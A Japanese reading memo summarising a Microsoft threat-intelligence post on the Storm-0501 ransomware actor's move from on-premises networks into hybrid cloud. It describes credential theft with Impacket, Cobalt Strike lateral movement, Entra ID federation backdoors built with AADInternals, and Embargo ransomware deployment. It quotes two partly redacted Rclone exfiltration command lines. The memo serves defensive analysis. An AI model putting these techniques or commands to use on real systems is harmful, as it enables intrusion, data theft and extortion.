読メモ:Storm-0501 Ransomware attacks expanding to hybrid cloud environments
このブログ記事では、Storm-0501 の戦術、技術、手順(TTP)、典型的な攻撃方法、クラウドへの拡張について説明します。また、Microsoft 製品を利用してこの種の攻撃に関連するアクティビティを検出する方法に関する情報については、ページ下部の参照元 URL をご確認ください。
オンプレミスの侵害
初期アクセスと偵察
Storm-0501 は当初、Storm-0249 や Storm-0900 などのアクセスブローカーの力を借りて初期アクセスを達成し、盗まれた可能性のある侵害された資格情報を利用してターゲットシステムにサインインしたり、パッチが適用されていない公開サーバーのさまざまな既知のリモートコード実行の脆弱性を悪用したりしていました。直近では、Storm-0501 は Zoho ManageEngine(CVE-2022-47966)、Citrix NetScaler(CVE-2023-4966)、および ColdFusion 2016 アプリケーション(CVE-2023-29300 または CVE-2023-38203) の既知の脆弱性を悪用したことを観察しています。Microsoft が観測したケースでは、これらの初期アクセス手法と、不十分な運用セキュリティ対策が相まって、脅威アクターはターゲットデバイスの管理者権限を獲得しています。
脅威アクターは、ネットワーク内のデバイスに対して初期アクセスとコード実行機能を取得した後、価値の高い資産や、ドメイン管理者ユーザーやドメインフォレストの信頼などの一般的なドメイン情報など、望ましい情報資産がある可能性のあるターゲットデバイスを見つけるために広範な検出を行いました。このフェーズでは、systeminfo.exe、net.exe、nltest.exe、tasklist.exe などの一般的なネイティブ Windows ツールとコマンドが利用されました。また、攻撃者は ossec-win32 や OSQuery などのオープンソース ツールを利用して、追加のエンドポイント情報をクエリしました。さらに、一部の攻撃では、脅威アクターが Active Directory の偵察のために obfs.ps1 または recon.ps1 と呼ばれる ADRecon.ps1 の難読化されたバージョンを実行していることが確認されました。
最初のアクセスと偵察の後、脅威アクターは、Level.io、AnyDesk、NinjaOneなどのいくつかのリモート監視および管理ツール(RMM)を展開して、侵害されたデバイスと通信し、永続性を確立しました。
資格情報アクセスと横移動
脅威アクターは、初期アクセス時に侵害したローカルデバイスの管理者権限を利用し、いくつかの方法でネットワーク内のより多くのアカウントにアクセスしようとしました。脅威アクターは主に、ネットワーク経由で資格情報を抽出する Impacket の SecretsDump モジュールを利用し、それを広範な数のデバイスで利用して資格情報を取得しました。脅威アクターは、侵害された資格情報を使用してネットワーク内のより多くのデバイスにアクセスし、その後、Impacket を再度活用して追加の資格情報を収集しました。その後、脅威アクターはこのプロセスを繰り返し、複数のドメイン管理者の資格情報を含む可能性のある大量の資格情報を侵害しました。
さらに、脅威アクターは、機密ファイルを読み取って秘密を収集しようとし、場合によっては侵害されたデバイスから KeePass の秘密を収集しようとしていることが観察されました。脅威アクターは、EncryptedStore の Find-KeePassConfig.ps1 PowerShell スクリプトを使用して、データベースの場所とキーファイル/ユーザー マスター キー情報を出力し、KeePass 実行可能ファイルを起動して資格情報を収集しました。Microsoft は、脅威アクターが特定のアカウントの追加認証情報を取得するために、数回にわたって広範なブルートフォース活動を行ったと中程度の信頼性で評価しています。
また、脅威アクターは、Cobalt Strikeを利用して、侵害された資格情報を使用し、ツールのコマンドアンドコントロール(C2) 機能を使用してエンドポイントと直接通信し、さらにコマンドを送信することで、ネットワーク上を横方向に移動することが確認されました。これらのキャンペーンで使用された一般的な Cobalt Strike Beacon ファイルの種類は、それぞれ rundll32.exe と regsvr32.exe によって起動された .dll ファイルと .ocx ファイルでした。また、このコバルトストライクビーコンに紐づく「license_id」は「666」です。「license_id」の定義は一般にウォーターマークと呼ばれ、Cobalt Strikeが提供する正規のライセンスごとに一意の 9 桁の値です。この場合、「license_id」は、すべてのビーコン設定で 3 桁の一意の値で変更されました。
私たちが観察したケースでは、脅威アクターによるキャンペーン全体の横方向の移動は、ドメイン管理者の侵害とドメインコントローラーへのアクセスによって終了し、最終的にネットワーク内のデバイス全体にランサムウェアを展開することができました。
データの収集と流出
脅威アクターは、侵害されたデバイスから機密データを盗み出していることが確認されました。データを盗み出すために、脅威アクターはオープンソースツールの Rclone を使用し、既知の Windows バイナリ名またはそれらのバリエーション (svhost.exeやscvhost.exeなど) に名前を変更しました。脅威アクターは、名前を変更した Rclone バイナリを使用して、複数のスレッド間で MegaSync などのパブリッククラウドストレージサービスにファイルを同期する専用構成を使用して、データをクラウドに転送しました。以下は、この動作を実証するために脅威アクターが使用するコマンドラインの例です。
Svhost.exe copy –filter-from [編集済] [編集済] config:[編集済] -q –ignore-existing –auto-confirm –multi-thread-streams 11 –transfers 11
scvhost.exe –config C:\Windows\Debug\a.conf copy [編集済 UNC パス] [編集済]
検出の回避
脅威アクターは、ハンズオンキーボードでアクセスした一部のデバイスのセキュリティ製品を改ざんすることで、検出を回避しようとしました。オープンソースのツールを使用し、PowerShellコマンドレットと既存のバイナリに頼って検出を回避し、場合によっては、セキュリティ製品を改ざんするためにグループポリシーオブジェクト(GPO)ポリシーを配布しました。
オンプレミスからクラウドへのピボット
Microsoft Entra Connect Sync アカウントの侵害
最近の Storm-0501 は、脅威アクターが Microsoft Entra Connect 同期サーバーを特定し、Microsoft Entra Connect クラウドとオンプレミスの同期アカウントのプレーンテキストの資格情報を抽出することができたと評価しています。 脅威アクターがこれを達成できたのは、Impacket を使用して資格情報や DPAPI 暗号化キーを盗んだり、セキュリティ製品を改ざんしたりするなど、このブログ記事で説明した以前の悪意のある活動によるものと評価しています。
クラウドのディレクトリ同期アカウントが侵害された後、脅威アクターはクリアテキストの資格情報を使用して認証し、Microsoft Graph へのアクセストークンを取得できます。Microsoft Entra Connect Sync アカウントが侵害されると、脅威アクターは任意のハイブリッド アカウント (Microsoft Entra ID に同期されたオンプレミス アカウント) の Microsoft Entra ID パスワードを設定または変更できるため、ターゲットに高いリスクをもたらします。
Microsoft は最近、Microsoft Entra Connect Sync と Microsoft Entra Cloud Sync のディレクトリ同期アカウント (DSA) ロールのアクセス許可を制限し、悪用を防ぐのに役立つ Microsoft Entra ID の変更を実装しました。
オンプレミスユーザーアカウントのクラウドセッションハイジャック
オンプレミスから Microsoft Entra ID にピボットする別の方法は、クラウドにそれぞれのユーザー アカウントを持つオンプレミスのユーザー アカウントを制御することです。調査した Storm-0501 の一部のケースでは、侵害されたドメイン管理者アカウントの少なくとも 1 つが、多要素認証 (MFA) が無効で、グローバル管理者ロールが割り当てられている Microsoft Entra ID のそれぞれのアカウントを持っていました。Microsoft Entra の管理者アカウントでは同期サービスを利用できないため、この場合、パスワードやその他のデータはオンプレミス アカウントから Microsoft Entra アカウントに同期されないことに注意してください。ただし、両方のアカウントのパスワードが同じ場合、またはオンプレミスの資格情報盗難手法 (つまり、Web ブラウザーのパスワード ストア) で取得できる場合は、ピボットが可能です。
侵害されたオンプレミスのユーザー アカウントに Microsoft Entra ID の管理者ロールが割り当てられておらず、クラウドに同期され、MFA や条件付きアクセスなどのセキュリティ境界が設定されていない場合、脅威アクターは次の方法でクラウドにエスカレートする可能性があります。
パスワードがわかっている場合は、どのデバイスからでも Microsoft Entraにログインできます。
パスワードが不明な場合、脅威アクターはオンプレミスのユーザーパスワードをリセットでき、数分後に新しいパスワードがクラウドに同期されます。
侵害された Microsoft Entra ディレクトリ同期アカウントの資格情報を保持している場合は、AADInternals の Set-AADIntUserPassword コマンドレットを使用してクラウド パスワードを設定できます。
そのユーザーアカウントの MFA が有効になっている場合、ユーザーによる認証では、脅威アクターが MFA を改ざんしたり、ユーザーが所有するデバイスを制御したりして、その後、クラウドセッションをハイジャックするか、MFA クレームとともに Microsoft Entra アクセストークンを抽出する必要があります。
サインイン オプションを制限する MFA または条件付きアクセス ポリシーがないと、特にユーザーが管理者特権を持っている場合、攻撃者がクラウド環境にピボットする可能性が広がります。管理者アカウントのセキュリティを強化するために、Microsoftは、すべてのAzureユーザーにMFAを要求する追加のテナントレベルのセキュリティ対策を展開しました。
バックドアにつながるクラウドの侵害
侵害された Microsoft Entra Connect 同期ユーザーアカウントまたはクラウドセッションハイジャックによって侵害されたクラウド管理者アカウントを通じて、オンプレミス環境からクラウドへのピボットに成功した後、脅威アクターは、グローバル管理者などの特権的な Microsoft Entra ID アカウントを使用して、侵害の有無に関わらず任意のデバイスから Microsoft Entra(ポータル/MS Graph) に接続することができました。
Storm-0501 のグローバル管理者アクセスが利用可能になると、テナントに新しいフェデレーションドメインを作成することで、後で使用するための永続的なバックドアアクセスが作成されていることが確認されました。このバックドアにより、攻撃者は、Microsoft Entra ID ユーザー プロパティ ImmutableId が既知であるか、攻撃者によって設定されている場合、手元にある Microsoft Entra ID テナントの任意のユーザーとしてサインインできます。Microsoft Entra Connect サービスによって同期されるように構成されているユーザーの場合、ImmutableId プロパティは自動的に設定されますが、同期されていないユーザーの既定値は null です。ただし、管理者権限を持つユーザーは、ImmutableId 値を追加できます。
脅威アクターは、オープンソースツールの AADInternals とその Microsoft Entra ID 機能を使用してバックドアを作成しました。AADInternals は、セキュリティ研究者や侵入テスト担当者向けに設計された PowerShell モジュールで、Microsoft Entra ID を操作およびテストするためのさまざまな方法を提供し、Storm-0501 で一般的に使用されます。バックドアを作成するには、脅威アクターはまず、Microsoft Entra ID に登録されている独自のドメインを持つ必要がありました。攻撃者の次のステップは、標的のドメインが管理されているかフェデレーションされているかを判断することです。Microsoft Entra ID のフェデレーション ドメインは、Active Directory フェデレーション サービス (AD FS) などのフェデレーション テクノロジを使用してユーザーを認証するように構成されたドメインです。ターゲットドメインが管理されている場合、攻撃者はそれをフェデレーションドメインに変換し、ユーザー認証および承認プロセスで将来のトークンに署名するためのルート証明書を提供する必要があります。ターゲット ドメインがすでにフェデレーションされている場合、攻撃者はルート証明書を "NextSigningCertificate" として追加する必要があります。
バックドアドメインが使用可能になると、脅威アクターは侵害されたテナントと自分のテナントとの間にフェデレーション信頼を作成します。脅威アクターは、Security Assertion Markup Language(SAMLまたはSAML2)トークンの作成を可能にする AADInternals コマンドを使用し、これを使用して組織内の任意のユーザーを偽装し、MFA をバイパスして任意のアプリケーションにサインインすることができます。Microsoft は、このアクターが SAML トークンを使用して Office 365 にサインインしていることを確認しました。
ランサムウェアにつながるオンプレミスの侵害
脅威アクターがネットワークを十分に制御し、機密ファイルを正常に抽出し、クラウド環境に横方向に移動すると、脅威アクターは組織全体にEmbargo ランサムウェアを展開しました。脅威アクターは必ずしもランサムウェアの配布に頼るわけではなく、場合によってはネットワークへのバックドアアクセスのみを維持していることがわかりました。
エンバーゴランサムウェアは、Rust で開発された新種であり、高度な暗号化方法を使用することが知られています。RaaS モデルで運営されているEmbargo の背後にあるランサムウェアグループは、Storm-0501のようなアフィリエイトが身代金の一部と引き換えに、そのプラットフォームを使用して攻撃を開始することを許可しています。禁輸関連会社は、最初に被害者のファイルを暗号化し、身代金が支払われない限り盗まれた機密データを漏洩すると脅す二重恐喝戦術を採用しています。
Microsoft が観測したケースでは、脅威アクターは侵害されたドメイン管理者アカウントを利用して、ネットワーク内のデバイス上の GPO を介して登録された「SysUpdate」という名前のスケジュールされたタスクを介してEmbargo ランサムウェアを配布しました。使用されたランサムウェアのバイナリ名は、PostalScanImporter.exe と win.exe でした。ターゲット デバイス上のファイルが暗号化されると、暗号化されたファイルの拡張子は .partial、.564ba1、および .embargo に変わりました。
参照元:Storm-0501:ランサムウェア攻撃がハイブリッドクラウド環境に拡大 |Microsoft セキュリティ ブログ